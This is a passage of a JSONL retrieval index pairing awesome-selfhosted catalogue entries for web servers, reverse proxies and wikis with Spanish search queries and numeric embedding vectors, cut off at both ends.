-0.02356, 0.00511, -0.00373, -0.05575, 0.02474, -0.01905, -0.0656, 0.00809, -0.07295, 0.05828, 0.04014, -0.06605, -0.03679, -0.05062, -0.03386, -0.00455, -0.01718, -0.04264, -0.01582, 0.02342, 0.05071, -0.01115, 0.02574, -0.00582]} -{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Static Web Server β€” Cross-platform, high-performance, and asynchronous web server for static file serving [Apache-2.0/MIT, Rust/Docker]. SWAG (Secure Web Application Gateway) β€” Nginx webserver and reverse proxy with PHP support, built-in Certbot (Let's Encrypt) client and fail2ban integration [GPL-3.0, Docker]. Traefik β€” HTTP reverse proxy and load balancer that makes deploying microservices easy [MIT, Go/Docker]. UUSEC WAF β€” Industry-leading high-performance, AI and semantic technology web application firewall and API security gateway (fork of nginx) [GPL-3.0, C/Lua/Docker]. Vinyl Cache β€” Web application accelerator/caching HTTP reverse proxy (formerly Varnish) [BSD-2-Clause, Go/deb/Docker]. Zoraxy β€” General purpose HTTP reverse proxy and forwarding tool [AGPL-3.0, Go/Docker].", "indexar": "que servidor estΓ‘tico hay para archivos web", "v": [-0.0157, -0.08849, -0.08605, -0.16481, -0.0578, -0.15076, 0.00685, -0.10198, 0.10453, 0.05558, -0.10096, -0.08358, 0.06234, 0.00513, 0.06759, 0.04165, 0.21876, -0.1298, 0.15072, 0.02234, 0.00288, 0.09539, 0.04784, 0.01396, -0.01942, -0.06126, 0.02171, 0.04269, -0.14047, 0.01658, -0.04096, -0.05125, 0.04467, 0.02983, 0.01668, 0.02051, 0.02934, 0.15497, -0.1289, 0.06395, 0.03374, -0.02115, -0.09485, 0.01864, -0.06119, -0.04266, 0.11234, -0.14441, 0.10603, -0.03017, -0.05534, -0.08349, -0.09911, 0.07609, -0.0502, 0.07724, 0.00976, -0.14553, 0.05737, -0.02771, -0.16701, 0.09124, -0.055, -0.05911, -0.0118, 0.06308, -0.05905, 0.02676, -0.07733, -0.00552, -0.00017, 0.02278, 0.07679, -0.05713, 0.04768, 0.03235, 0.0053, -0.03661, 0.0082, 0.03358, 0.10191, 0.05461, -0.02706, 0.14154, -0.11742, -0.08079, -0.00163, 0.01137, 0.08464, -0.00692, 0.08984, 0.06734, -0.11202, 0.03773, -0.01709, -0.06271, 0.10756, -0.08224, 0.01452, -0.05822, -0.00665, 0.07177, -0.00919, 0.04484, 0.05565, 0.14866, 0.10333, -0.0076, 0.01055, -0.02133, 0.07687, -0.0288, 0.02427, 0.04549, -0.07943, -0.00642, 0.05174, 0.00965, 0.05728, 0.00026, -0.03296, 0.03558, -0.01277, 0.02691, -0.0288, -0.01234, 0.09186, -0.0153, -0.05428, -0.05019, -0.01184, -0.05113, -0.12763, 0.03022, -0.05318, 0.07123, 0.07799, -0.00486, -0.0754, -0.01068, 0.03563, -0.02607, -0.08407, 0.08822, 0.13326, 0.00044, 0.07322, -0.03169, -0.11824, -0.04113, -0.01882, -0.05752, -0.06646, -0.07123, -0.12571, 0.00741, -0.03046, -0.12254, -0.0624, -0.00812, -0.00786, 0.05637, 0.00136, 0.09575, -0.03121, -0.03, -0.02413, 0.10074, 0.0144, 0.00913, 0.01951, 0.03996, -0.03701, -0.07211, 0.04626, 0.05212, -0.07847, -0.05744, 0.04145, 0.00441, -0.0126, -0.05114, -0.01821, 0.05656, -0.06575, -0.03096, 0.02868, 0.0147, -0.06034, 0.06303, 0.00746, -0.0101, -0.08047, 0.08198, 0.0325, -0.02975, -0.04576, -0.02497, -0.00758, -0.03209, -0.01201, -0.08218, -0.03591, 0.00589, -0.02826, -0.00763, 0.01638, -0.03237, 0.01391, -0.01525, -0.04266, -0.03448, 0.08866, -0.08068, 0.01328, -0.01264, 0.07498, -0.032, 0.00461, -0.04915, 0.00107, 0.0035, -0.01779, 0.00736, 0.00214, 0.05349, -0.02545, -0.03215, 0.04747, -0.02888, -0.06157, -0.01028, -0.05516, 0.00336, -0.01976, -0.01069, 0.00501, -0.02853, -0.02264, -0.04781, -0.0163, 0.06536, -0.01341, 0.01096, 0.00487, -0.08474, 0.00133, -0.01512, -0.02585, 0.00612, 0.00866, -0.03414, -0.03481, 0.00684, 0.01665, 0.01815]} -{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Static Web Server β€” Cross-platform, high-performance, and asynchronous web server for static file serving [Apache-2.0/MIT, Rust/Docker]. SWAG (Secure Web Application Gateway) β€” Nginx webserver and reverse proxy with PHP support, built-in Certbot (Let's Encrypt) client and fail2ban integration [GPL-3.0, Docker]. Traefik β€” HTTP reverse proxy and load balancer that makes deploying microservices easy [MIT, Go/Docker]. UUSEC WAF β€” Industry-leading high-performance, AI and semantic technology web application firewall and API security gateway (fork of nginx) [GPL-3.0, C/Lua/Docker]. Vinyl Cache β€” Web application accelerator/caching HTTP reverse proxy (formerly Varnish) [BSD-2-Clause, Go/deb/Docker]. Zoraxy β€” General purpose HTTP reverse proxy and forwarding tool [AGPL-3.0, Go/Docker].", "indexar": "con quΓ© puedo montar un servidor inverso de alto rendimiento", "v": [0.05697, 0.08035, -0.22168, -0.0573, -0.09861, 0.01183, -0.02114, -0.05318, -0.10815, -0.09755, -0.07876, -0.05885, 0.05214, 0.01245, 0.12241, 0.13186, 0.12827, -0.07682, -0.00792, 0.01972, -0.00539, -0.1317, 0.08193, -0.14528, 0.04034, 0.10523, -0.0184, 0.04357, -0.09361, -0.06245, -0.02084, 0.05245, 0.05235, -0.0228, 0.02309, -0.08403, -0.03029, 0.10782, 0.0037, 0.02309, 0.04685, 0.03388, -0.0204, -0.00805, 0.02564, -0.00149, 0.05495, -0.04503, 0.09755, -0.06672, -0.00674, -0.12593, -0.02984, -0.08748, -0.0434, -0.02264, 0.08231, -0.06535, 0.12537, -0.16736, -0.03314, 0.0652, -0.09369, -0.00888, 0.08492, -0.04869, -0.13401, -0.05746, -0.03268, -0.07552, -0.07211, 0.00589, -0.01096, -0.05435, 0.08667, 0.1067, 0.03041, 0.02635, -0.0255, 0.02172, -0.0833, -0.02047, -0.06395, 0.11049, -0.08288, -0.08407, -0.00977, -0.09218, 0.09087, 0.0758, 0.05077, 0.08899, -0.1133, -0.01504, -0.04836, -0.04708, 0.10537, 0.01522, 0.00536, 0.01474, -0.02945, 0.07096, -0.00349, 0.11207, 0.05089, 0.11056, 0.05307, -0.06258, -0.00644, 0.01516, 0.07483, -0.06718, -0.08717, 0.03375, -0.02984, -0.13786, -0.05681, 0.06206, 0.0205, 0.07717, -0.11167, 0.03208, 0.09462, 0.03967, 0.02844, -0.11725, 0.08551, 0.05399, 0.05033, -0.03194, -0.04095, -0.02195, -0.03819, -0.06301, -0.04532, 0.05221, 0.08319, -0.00269, -0.07182, -0.00593, 0.10511, 0.00117, -0.02192, -0.05281, 0.04889, -0.0155, 0.15686, -0.12545, -0.06944, 0.02457, 0.04414, 0.06547, 0.04489, -0.00831, -0.10547, -0.09501, 0.01642, -0.13691, -0.04594, 0.0881, 0.00205, 0.07203, 0.05228, 0.09034, 0.01657, -0.02015, -0.03159, 0.03552, 0.04504, 0.01862, -0.11373, -0.00892, 0.0231, -0.06985, 0.04102, -0.0123, -0.03996, 0.02868, 0.0241, 0.0242, -0.02752, -0.01271, -0.02118, -0.05047, -0.06284, -0.00228, 0.02939, 0.0155, 0.0446, 0.00492, 0.04708, 0.05527, -0.03723, 0.00845, 0.03264, -0.04047, 0.00497, -0.05078, 0.03224, 0.00609, 0.02188, -0.0325, -0.02671, -0.02535, 0.02245, -0.01864, -0.09528, 0.08959, 0.01254, 0.07024, -0.01977, 0.00183, 0.08175, 0.01493, -0.01373, 0.02153, 0.06177, -0.05335, -0.04448, 0.00977, -0.01792, 0.00938, 0.0293, 0.00961, 0.01212, 0.00371, 0.01809, -0.01517, 0.05918, 0.0224, -0.08218, 0.0639, -0.04708, -0.00095, 0.00246, 0.02706, 0.00347, -0.04131, -0.00238, -0.05417, 0.04395, 0.07073, 0.04599, -0.06442, -0.00871, -0.03653, -0.02462, 0.00036, -0.02344, -0.04027, -0.00376, -0.00966, 0.01027, -0.03971, 0.01512, -0.06163]} -{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Static Web Server β€” Cross-platform, high-performance, and asynchronous web server for static file serving [Apache-2.0/MIT, Rust/Docker]. SWAG (Secure Web Application Gateway) β€” Nginx webserver and reverse proxy with PHP support, built-in Certbot (Let's Encrypt) client and fail2ban integration [GPL-3.0, Docker]. Traefik β€” HTTP reverse proxy and load balancer that makes deploying microservices easy [MIT, Go/Docker]. UUSEC WAF β€” Industry-leading high-performance, AI and semantic technology web application firewall and API security gateway (fork of nginx) [GPL-3.0, C/Lua/Docker]. Vinyl Cache β€” Web application accelerator/caching HTTP reverse proxy (formerly Varnish) [BSD-2-Clause, Go/deb/Docker]. Zoraxy β€” General purpose HTTP reverse proxy and forwarding tool [AGPL-3.0, Go/Docker].", "indexar": "cual es una alternativa libre a nginx con soporte para php", "v": [0.0597, 0.00803, -0.09709, 0.01325, -0.01261, -0.0657, -0.15524, -0.14229, -0.15202, -0.02181, -0.04449, -0.10812, 0.01157, -0.03158, -0.10361, -0.04335, -0.07353, -0.11803, 0.11603, 0.05423, -0.12153, 0.05662, -0.13962, -0.12328, 0.05222, -0.10587, 0.03585, 0.03105, -0.07031, -0.03825, 0.0214, -0.06897, -0.02498, 0.11984, -0.0574, 0.06933, 0.1126, 0.08743, 0.02983, -0.0263, -0.07084, -0.09665, -0.02123, 0.11557, -0.08282, -0.07815, -0.02901, -0.00483, 0.0897, -0.00144, -0.00867, -0.06976, -0.09262, 0.01541, 0.00527, -0.00798, 0.1608, -0.24385, -0.0258, 0.00451, -0.09605, 0.03575, -0.07449, -0.03782, 0.0007, 0.04293, -0.03433, 0.03257, -0.11924, 0.054, -0.00684, 0.08899, 0.02395, -0.09311, -0.06227, 0.08403, 0.01003, -0.0124, -0.09738, 0.00775, 0.03627, 0.02664, 0.01811, 0.08861, -0.05154, -0.13907, -0.00737, -0.09798, 0.06484, 0.01951, 0.04555, 0.01483, -0.05881, 0.10677, -0.03444, -0.10579, -0.02522, -0.0111, 0.00452, -0.05739, 0.01213, 0.07909, -0.06759, -0.03817, 0.08419, -0.15766, 0.09795, -0.01431, -0.11947, -0.01505, 0.08204, 0.07349, -0.05448, -0.0186, 0.03953, -0.08116, 0.01397, 0.05297, 0.00908, -0.0183, 0.01276, -0.01031, -0.00683, -0.02736, 0.1134, 0.08035, 0.13858, 0.0447, -0.00651, -0.00136, 0.06849, -0.07134, -0.02283, -0.01885, -0.05049, 0.0508, 0.15405, 0.00638, 0.00153, 0.01311, 0.02099, -0.03701, 0.03919, 0.00138, 0.03723, -0.04485, 0.02717, 0.03339, 0.05134, -0.07191, -0.01311, 0.00075, -0.01658, 0.04832, -0.11524, 0.00068, 0.00136, -0.00279, -0.08608, 0.10306, 0.07566, -0.07032, 0.01877, 0.01916, -0.04003, 0.02736, -0.07145, -0.01143, -0.03124, 0.00703, -0.02012, 0.07831, 0.09088, -0.097, 0.03248, -0.05975, -0.02724, -0.10589, 0.07909, -0.06174, 0.05562, -0.00929, -0.02543, -0.00051, -0.03263, -0.05878, 0.01262, 0.03991, 0.03132, 0.01855, -0.06903, 0.02034, -0.10202, -0.08708, 0.00968, 0.0326, -0.03015, -0.07768, 0.02813, 0.0323, -0.05108, -0.00387, 0.00727, -0.05955, 0.02291, -0.0289, -0.01897, -0.0226, 0.06037, 0.00281, 0.04474, 0.01233, 0.06149, 0.05503, -0.07605, -0.03727, 0.03766, 0.0095, 0.00875, -0.01762, -0.02564, 0.02287, 0.02814, 0.03344, 0.00175, 0.02994, 0.03553, 0.03053, -0.0283, -0.00068, -0.00035, -0.04641, -0.01915, 0.03559, 0.01659, 0.00167, 0.01803, -0.01108, -0.01404, 0.02489, 0.04444, 0.07879, -0.05994, -0.00037, -0.01679, -0.00252, -0.10748, 0.01407, -0.06217, -0.03455, -0.02911, 0.04553, -0.02339, -0.01695, 0.02238, 0.02526]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: AmuseWiki β€” Amusewiki is based on the Emacs Muse markup, remaining mostly compatible with the original implementation. It can work as a read-only site, as a moderated wiki, or as a fully open wiki or even as a private site [GPL-1.0, Perl/Docker]. BookStack β€” Organize and store information. Stores documentation in a book like fashion [MIT, PHP/Docker]. django-wiki β€” Wiki system with complex functionality for simple integration and a superb interface. Store your knowledge with style: Use django models [GPL-3.0, Python]. docmost Community Edition β€” Collaborative wiki and documentation software (alternative to Confluence, Notion) [AGPL-3.0, Docker/Nodejs]. Documize β€” Modern Docs + Wiki software with built-in workflow, single binary executable, just bring MySQL/Percona [AGPL-3.0, Go]. Dokuwiki β€” Easy to use, lightweight, standards-compliant wiki engine with a simple syntax allowing reading the data outside the wiki. All data is stored in plain text files, therefore no database is required [GPL-2.0, PHP].", "indexar": "que programa hay para gestionar documentaciΓ³n y wikis en casa?", "v": [-0.0255, 0.05076, -0.02215, -0.19442, 0.09166, -0.13232, -0.03749, -0.03926, 0.02143, -0.07896, -0.04389, -0.16788, -0.02155, -0.06201, -0.05922, 0.03431, 0.21095, -0.16648, 0.02751, 0.02687, -0.04747, 0.07721, -0.00045, 0.0624, -0.10106, -0.05173, 0.11073, -0.15299, 0.00077, 0.01384, -0.01985, 0.07533, -0.10808, -0.09633, 0.01132, 0.12523, -0.04173, 0.0096, 0.08417, -0.0301, -0.0712, -0.02274, -0.00289, 0.03942, 0.00222, -0.04859, 0.12054, -0.10289, 0.02143, -0.12795, -0.1093, -0.11374, -0.00789, 0.04431, -0.01284, -0.13767, 0.05713, -0.18786, 0.02142, 0.02309, -0.02512, 0.08953, -0.02428, 0.05221, 0.06365, -0.01877, 0.11962, 0.06478, 0.01669, 0.06713, -0.10099, -0.00877, 0.02143, -0.00467, -0.01997, -0.11148, -0.01444, -0.01557, -0.03514, -0.01727, -0.01604, -0.02718, -0.03854, 0.06846, -0.00226, -0.05934, -0.05276, -0.03008, 0.09739, -0.05153, 0.00194, -0.06135, -0.01439, -0.0332, 0.06903, -0.07398, 0.14744, 0.08073, 0.04976, 0.00478, -0.09834, -0.08965, -0.08543, 0.0302, -0.0903, 0.09762, 0.03664, -0.0148, -0.14124, 0.039, -0.02365, 0.06905, -0.04896, 0.06817, -0.04897, 0.06544, 0.03464, 0.03346, 0.00939, -0.10714, -0.04618, -0.03015, -0.02487, 0.00148, 0.02869, -0.02107, 0.0494, 0.07979, 5e-05, 0.1017, -0.04528, -0.07575, -0.0603, 0.05304, -0.02649, -0.00237, -0.09785, -0.03454, -0.02545, -0.06564, -0.09583, 0.0234, 0.02673, 0.0385, 0.03504, -0.0634, -0.04464, 0.0599, -0.04432, 0.07255, -0.00623, -0.00456, -0.01176, 0.05157, -0.05396, 0.03679, 0.07804, 0.02373, -0.11812, -0.03171, -0.06335, -0.02811, -0.04566, -0.07549, 0.01733, 0.06009, 0.02472, 0.07463, -0.02714, 0.0062, -0.03677, 0.06973, -0.00925, -0.01814, 0.00302, -0.09199, 0.05363, -0.06756, -0.02521, -0.0248, -0.06502, -0.00667, 0.05825, 0.02105, -0.0185, 0.03709, -0.06454, 0.0778, -0.02284, -0.05007, -0.07782, -0.01548, 0.01858, 0.0473, 0.01342, 0.03097, -0.05191, -0.0213, 0.0474, -0.04108, -0.06515, -0.0231, 0.09062, 0.06404, 0.03248, 0.10749, 0.0163, -0.03266, 0.09902, 0.08149, -0.04804, -0.02627, -0.00258, 0.0202, -0.09301, -0.00225, -0.03982, 0.0374, 0.05632, 0.08126, 0.06973, 0.02269, -0.02755, 0.00691, 0.04442, -0.04384, 0.04771, -0.04014, 0.00293, 0.02561, 0.00988, -0.07822, 0.06641, 0.02444, 0.00194, -0.01741, 0.05147, -0.07856, 0.0116, 0.00084, -0.08454, 0.01343, 0.02604, 0.01454, -0.01547, 0.00931, -0.0079, 0.00798, 0.04359, 0.02368, -0.00323, -0.0299, -0.01129, -0.00261, 0.03437, -0.02317]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: AmuseWiki β€” Amusewiki is based on the Emacs Muse markup, remaining mostly compatible with the original implementation. It can work as a read-only site, as a moderated wiki, or as a fully open wiki or even as a private site [GPL-1.0, Perl/Docker]. BookStack β€” Organize and store information. Stores documentation in a book like fashion [MIT, PHP/Docker]. django-wiki β€” Wiki system with complex functionality for simple integration and a superb interface. Store your knowledge with style: Use django models [GPL-3.0, Python]. docmost Community Edition β€” Collaborative wiki and documentation software (alternative to Confluence, Notion) [AGPL-3.0, Docker/Nodejs]. Documize β€” Modern Docs + Wiki software with built-in workflow, single binary executable, just bring MySQL/Percona [AGPL-3.0, Go]. Dokuwiki β€” Easy to use, lightweight, standards-compliant wiki engine with a simple syntax allowing reading the data outside the wiki. All data is stored in plain text files, therefore no database is required [GPL-2.0, PHP].", "indexar": "con que puedo montar una wiki colaborativa sin necesidad de base de datos compleja?", "v": [0.11819, 0.12131, -0.17478, -0.07744, -0.02954, -0.10207, -0.02376, 0.03178, -0.09993, -0.11796, -0.03377, -0.15726, 0.00056, -0.05337, 0.01142, 0.00046, 0.10647, -0.18138, -0.00118, -0.11391, -0.00067, -0.08863, 0.00448, -0.02336, -0.01607, -0.04111, 0.0368, -0.07428, -0.09557, 0.00944, -0.02455, 0.10497, -0.06891, 0.11895, -0.04785, 0.0395, -0.09558, -0.06825, 0.06789, -0.17043, -0.16562, -0.09525, -0.12306, 0.08957, 0.02409, 0.13568, -0.04619, -0.09347, 0.0005, -0.00428, -0.01435, 0.02876, -0.11144, -0.0401, -0.13023, -0.11002, 0.20109, -0.08397, 0.07647, 0.07868, -0.07735, 0.10134, -0.08947, 0.03177, 0.04281, -0.03602, 0.00376, -0.0158, -0.03394, 0.15903, -0.06372, -0.00873, -0.06927, -0.13849, 0.06014, -0.04215, 0.13581, -0.05506, -0.03903, 0.05637, 0.0014, 0.0561, 0.00053, 0.07807, 0.02285, -0.00303, 0.14332, -0.03286, 0.17104, -0.01955, 0.05256, 0.01811, 0.00904, -0.02669, 0.10783, -0.04812, 0.02834, 0.06846, 0.02393, 0.06065, -0.079, -0.02021, 0.00977, -0.01942, 0.06308, 0.0481, 0.07222, 0.00981, -0.01961, 0.0082, 0.05486, 0.03256, -0.00032, -0.04601, 0.00363, -0.08707, -0.0417, 0.12235, -0.07117, -0.01148, 0.04922, 0.0084, 0.01965, -0.02395, 0.01819, -0.02267, 0.01752, 0.12303, 0.0576, -0.01777, -0.07836, 0.031, -0.04676, 0.0312, 0.0883, 0.07669, -0.05705, -0.04017, -0.04499, -0.00837, -0.02184, -0.00241, -0.00321, -0.01615, 0.01259, -0.0207, 0.06701, 0.02329, -0.08818, 0.00963, 0.01997, 0.09294, 0.02507, 0.04019, -0.11366, 0.05575, 0.0639, -0.00639, 0.04671, -0.00137, 0.01412, 0.05082, -0.0916, -0.0161, -0.00451, -0.09643, 0.00446, 0.02451, 0.01703, 0.02571, -0.07136, 0.05362, 0.03002, -0.04928, 0.05479, 0.0059, -0.08889, -0.04722, -0.04985, -0.05069, 0.01916, -0.04606, -0.00568, 0.00849, 0.01671, -0.02142, 0.0073, -0.03214, 0.00391, -0.01981, 0.01021, 0.03696, 0.03787, 0.00844, 0.05409, -0.06892, -0.0036, -0.00058, 0.03826, -0.06473, 0.00174, 0.06336, -0.00407, 0.01125, 0.02467, -0.00447, -0.01476, 0.01882, 0.10914, -0.0183, 0.01772, -0.02873, -0.01075, -0.05376, 0.00037, -0.02857, -0.01264, -0.00634, -0.06385, 0.03884, -0.05053, 0.03436, 0.08216, -0.02562, 0.01052, 0.03754, 0.05756, -0.00087, 0.00571, -0.04405, 0.02835, -0.01625, 0.01989, -0.02662, 0.0436, 0.01215, -0.03655, 0.00192, -0.02945, 0.00989, 0.02431, 0.02302, -0.01495, -0.05233, 0.01989, -0.06003, -0.07422, 0.0215, -0.00901, -0.06851, -0.03003, -0.03773, 0.00782, -0.03337, -0.02855, -0.03331]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: AmuseWiki β€” Amusewiki is based on the Emacs Muse markup, remaining mostly compatible with the original implementation. It can work as a read-only site, as a moderated wiki, or as a fully open wiki or even as a private site [GPL-1.0, Perl/Docker]. BookStack β€” Organize and store information. Stores documentation in a book like fashion [MIT, PHP/Docker]. django-wiki β€” Wiki system with complex functionality for simple integration and a superb interface. Store your knowledge with style: Use django models [GPL-3.0, Python]. docmost Community Edition β€” Collaborative wiki and documentation software (alternative to Confluence, Notion) [AGPL-3.0, Docker/Nodejs]. Documize β€” Modern Docs + Wiki software with built-in workflow, single binary executable, just bring MySQL/Percona [AGPL-3.0, Go]. Dokuwiki β€” Easy to use, lightweight, standards-compliant wiki engine with a simple syntax allowing reading the data outside the wiki. All data is stored in plain text files, therefore no database is required [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a Notion o Confluence para documentar proyectos?", "v": [-0.1203, 0.04664, -0.04405, -0.11836, -0.02054, -0.0018, -0.00527, -0.03828, -0.13624, -0.00745, -0.01126, -0.13508, -0.0899, -0.08441, -0.00449, -0.04985, 0.14464, -0.07588, 0.034, -0.02708, -0.21203, -0.05512, -0.04136, -0.04916, 0.01783, -0.14781, -0.06422, 0.04309, 0.06656, -0.0052, 0.02524, -0.03333, 0.06572, 0.03024, 0.01262, 0.01679, 0.0848, 0.0402, 0.01884, -0.05733, -0.07687, -0.04733, -0.05924, 0.17428, -0.05626, -0.11689, -0.13586, -0.03481, 0.01231, -0.02595, -0.02928, -0.00826, -0.09216, 0.11692, 0.02301, -0.09809, 0.05001, -0.16186, -0.04613, 0.0004, -0.02497, -0.0001, -0.03039, -0.16814, 0.11438, -0.02177, -0.02721, 0.0227, -0.00852, 0.03501, 0.0701, 0.00015, 0.0701, -0.06301, -0.10198, -0.00598, -0.06482, -0.07991, -0.05862, 0.00388, 0.03213, -0.03406, 0.05078, -0.02392, -0.01902, -0.01503, 0.03776, -0.07974, 0.05014, 0.02583, -0.0138, 0.0537, 0.03484, 0.03993, 0.09399, -0.06982, 0.11953, 0.10712, -0.04465, -0.00375, -0.03346, 0.06582, -0.06768, -0.01107, 0.05247, 0.10231, 0.0029, 0.02285, -0.14515, 0.07168, -0.05497, 0.10994, -0.06299, -0.01324, 0.00789, -0.00198, -0.01819, 0.00438, 0.05402, -0.07496, 0.04675, -0.01277, -0.04584, -0.1322, 0.01905, 0.02469, -0.07212, -0.00848, 0.00099, 0.05127, 0.1303, 0.03891, -0.01024, -0.05289, -0.02859, -0.0712, 0.06464, -0.10497, -0.00887, -0.06333, 0.03431, -0.0971, 0.02183, 0.03874, 0.02021, -0.06228, -0.0166, -0.02762, 0.00019, -0.03243, -0.06745, -0.05114, 0.03437, 0.08933, -0.02246, 0.09142, 0.04466, -0.00413, -0.08486, 0.07126, 0.05401, -0.05051, 0.00448, -0.05007, 0.05411, -0.023, -0.06734, 0.02414, -0.03491, 0.02349, 0.08292, -0.02619, 0.0188, -0.05387, 0.03705, -0.10286, 0.02339, -0.10124, 0.06335, -0.07968, -0.01317, 0.06857, -0.00861, 0.04031, 0.04201, -0.10053, -0.02181, 0.01794, 0.08344, 0.09226, -0.04077, 0.02063, -0.03941, -0.05147, -0.01188, -0.03308, 0.03624, -0.08904, 0.05637, 0.07047, -0.10032, -0.12001, -0.03352, -0.01055, -0.05135, 0.04395, -0.09823, 0.05226, 0.0265, 0.08463, 0.03879, -0.03073, 0.05374, -0.02058, -0.1167, -0.00437, 0.0542, 0.04618, -0.00334, 0.00128, 0.06874, -0.00656, -0.02324, -0.01503, 0.06896, -0.00024, 0.09748, 0.01506, -0.07804, -0.06241, -0.02438, -0.00187, -0.04678, 0.01854, 0.04086, 0.03671, -0.04471, 0.01383, -0.02953, 0.01163, 0.05559, 0.08031, -0.04855, 0.00358, -0.00475, 0.06679, -0.03795, 0.01022, 0.00306, -0.08122, 0.01555, 0.06316, 0.03099, -0.00629, 0.07242, 0.01887]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: Feather Wiki β€” A lightning fast and infinitely extensible tool for creating personal non-linear notebooks, databases, and wikis that is entirely self-contained, runs in your browser, and is only 58 kilobytes in size [AGPL-3.0, Javascript]. Gitit β€” Wiki program that stores pages and uploaded files in a git repository, which can then be modified using the VCS command line tools or the wiki's web interface [GPL-2.0, Haskell]. Gollum β€” Simple, Git-powered wiki with a sweet API and local frontend [MIT, Ruby]. LeafWiki β€” A fast wiki for people who think in folders, not feeds. Fast editing. Tree navigation. Markdown on disk [MIT, Docker/Go]. Mediawiki β€” Wiki software package that powers Wikipedia and all other Wikimedia projects, serving hundreds of millions of users each month [GPL-2.0, PHP]. Mycorrhiza Wiki β€” Filesystem and git-based wiki engine written in Go using Mycomarkup as its primary markup language [AGPL-3.0, Go]. Otter Wiki β€” Simple, easy to use wiki software using markdown [MIT, Docker].", "indexar": "que programa sirve para crear wikis que funcionen directamente en el navegador sin servidores?", "v": [-0.01323, -0.0391, -0.19662, -0.17693, 0.08254, -0.24257, 0.00118, -0.15422, 0.09649, -0.18247, -0.02782, -0.10972, -0.01758, -0.13575, 0.0418, 0.06258, 0.17946, -0.15503, 0.12825, 0.06388, -0.01327, -0.00556, 0.06956, -0.00637, -0.0776, -0.01987, 0.04666, -0.14063, -0.06163, 0.01083, -0.01455, -0.01698, 0.05743, -0.0665, 0.02063, 0.00023, -0.00848, 0.12769, 0.03379, 0.09532, -0.00412, 0.00719, -0.08697, 0.04078, -0.10377, 0.03404, 0.10954, -0.12179, 0.06339, -0.02496, -0.02334, -0.04906, -0.09976, 0.04307, -0.10141, -0.0758, -0.00689, -0.16947, -0.01845, 0.06413, -0.09698, 0.06686, -0.02715, -0.05253, 0.08283, -0.0682, 0.05843, -0.03746, -0.0159, 0.04284, -0.06261, -0.00465, 0.01572, -0.04289, 0.06339, 0.05819, -0.05668, -0.00785, 0.0138, 0.04021, 0.0372, 0.03703, -0.0204, 0.01034, -0.08109, -0.07851, -0.00853, 0.01838, 0.05084, -0.0451, 0.02982, 0.1026, 0.00569, 0.04025, 0.02819, -0.06208, 0.1741, -0.04535, 0.06258, 0.0489, 0.01538, -0.14041, -0.02669, 0.03547, -0.05912, 0.07923, 0.12328, -0.04103, -0.03264, 0.05457, 0.1231, -0.04448, -0.09691, -0.03321, -0.02063, 0.02296, -0.01093, 0.01444, -0.02592, -0.02003, -0.09604, 0.01863, -0.09269, 0.034, 0.00526, 0.0635, 0.04133, 0.02998, -0.02373, 0.00585, 0.00886, -0.09109, -0.07268, 0.07267, -0.09635, -0.05221, 0.046, 0.00351, -0.00221, -0.01616, 0.06027, 0.03168, -0.01271, 0.03762, 0.00718, -0.05514, 0.10084, -0.03609, -0.03689, -0.03091, -0.00463, -0.05391, -0.0371, 0.00784, -0.10674, -0.0135, -0.02927, 0.00027, -0.07574, 0.07407, -0.0262, 0.01085, 0.02138, 0.02023, 0.01771, -0.06153, -0.09231, 0.03065, 0.10579, 0.04798, -0.05358, 0.06514, 0.05392, -0.1187, -0.00817, 0.03524, -0.02924, 0.02494, 0.08947, 0.01738, -0.01758, -0.01294, 0.00189, 0.00842, -0.10731, -0.08787, -0.04065, 0.03152, -0.08214, 0.02166, -0.03974, -0.01717, -0.02539, 0.02657, 0.07626, 0.02811, -0.01016, -0.01557, 0.00159, -0.07754, 0.01687, -0.02806, 0.01629, 0.00545, 0.00941, 0.03183, 0.01843, -0.00773, 0.06303, 0.06945, -0.03524, -0.02158, 0.03591, 0.00531, 0.01781, -0.02073, 0.05646, -0.01425, 0.01095, -0.00964, 0.01363, -0.05661, -0.00949, 0.02829, 0.05378, 0.04146, 0.03379, -0.02769, -0.03176, 0.00203, 0.0071, -0.05934, -0.03463, -0.03106, -0.0209, -0.03565, 0.03558, -0.01436, 0.00163, -0.03921, -0.05052, 0.0398, 0.01545, -0.06626, 0.00582, -0.03894, 0.00041, -0.06441, -0.01538, -0.00146, -0.03523, -0.00104, 0.00789, 0.00707, 0.02073, 0.00601]} -{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: Feather Wiki β€” A lightning fast and infinitely extensible tool for creating personal non-linear 